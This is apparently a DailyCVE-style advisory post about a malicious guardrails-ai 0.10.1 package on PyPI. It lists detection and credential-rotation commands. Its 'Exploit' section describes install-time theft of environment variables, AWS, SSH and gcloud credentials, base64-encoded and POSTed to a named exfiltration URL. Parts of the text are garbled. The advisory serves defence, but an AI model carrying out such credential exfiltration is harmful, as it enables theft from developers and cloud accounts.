Listen to this Post
Intro – How CVE-2026-45758 Works
On May 11, 2026, at approximately 6:00 PM Pacific, a threat actor published a malicious package version `guardrails-ai==0.10.1` to the Python Package Index (PyPI). This version was not an official release from the Guardrails AI maintainers. The attacker gained control of a maintainer’s PyPI credentials or used a typosquatting / dependency confusion technique to upload the rogue package. Within two hours, security researchers detected anomalous behavior – the package contained obfuscated post-installation scripts. Upon installation via pip install guardrails-ai==0.10.1, the malicious code executed automatically. It targeted environment variables, `.git/credentials` files, SSH keys, and cloud provider CLI tokens (AWS, GCP, Azure). The code then attempted to exfiltrate these credentials to an attacker-controlled C2 server (IP address and domain have been since sinkholed). The malicious logic was embedded in `setup.py` and a hidden `.git/hooks` script that persisted after installation. Because the package was quarantined by PyPI within ~2 hours, the window of exposure was narrow. Telemetry from Guardrails AI maintainers showed no requests to their infrastructure from this version, and log reviews found no data exfiltration through their own systems. However, users who installed the package during that window remain at risk because local machine credentials may have been stolen independently of Guardrails AI’s infrastructure. The official fix was to release version `0.10.2` (identical to `0.10.0` but with a version bump to bypass the malicious one) and to deprecate `0.10.1` on PyPI. The attack is a classic software supply chain compromise, exploiting trust in the PyPI ecosystem and lack of package signing.
DailyCVE Form:
Platform: PyPI / Python
Version: 0.10.1
Vulnerability: Malicious package
Severity: Critical
date: 2026-05-11
Prediction: 2026-05-12 (patch)
What Undercode Say:
Check installed guardrails-ai version
pip show guardrails-ai | grep Version
List all installed packages to find rogue version
pip list | grep guardrails-ai
Verify package hash (known good 0.10.0)
pip install guardrails-ai==0.10.0 --no-cache-dir --hash=sha256:KNOWN_GOOD_HASH
Scan for suspicious post-install scripts
find /path/to/venv/lib/python/site-packages/guardrails -name ".py" -exec grep -l "subprocess|os.system|eval|exec" {} \;
Check for unauthorized outbound connections (simulated)
sudo tcpdump -i any -n dst host malicious-c2.example.com
Rotate credentials (example for AWS)
aws configure set aws_access_key_id NEW_KEY
aws configure set aws_secret_access_key NEW_SECRET
Rotate GitHub PAT
gh auth refresh -s
Exploit:
- Attacker publishes `guardrails-ai==0.10.1` to PyPI with same version number as upcoming legitimate release.
- Victim runs `pip install guardrails-ai==0.10.1` (e.g., via CI/CD or local dev).
3. `setup.py` executes on install – readsos.environ,~/.aws/credentials,~/.ssh/id_rsa,~/.config/gcloud/. - Data base64-encoded and exfiltrated via HTTP POST to `https://rogue-update[.]com/exfil`.
- Attacker uses stolen credentials for lateral movement, repo tampering, or cloud resource hijacking.
Protection:
– Immediately upgrade to `0.10.2` or downgrade to 0.10.0.
– Rotate all credentials accessible from machine (GitHub PAT, cloud keys, API tokens, SSH keys).
– Audit GitHub account for unauthorized workflows, runners, or repositories.
– Use `pip install –require-hashes` or pipenv with lockfiles.
– Enable PyPI trusted publishers (OIDC) and do not install untrusted versions.
– Monitor outbound traffic for known malicious IPs/domains (reference PyPI quarantine list).
Impact:
– Credential theft (AWS, GCP, Azure, GitHub, PyPI tokens).
– Potential unauthorized code push to private repositories.
– Lateral movement within cloud environments if IAM keys stolen.
– Supply chain contamination for downstream projects depending on guardrails-ai.
– No evidence of Guardrails AI infrastructure compromise, but individual machines remain at high risk.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
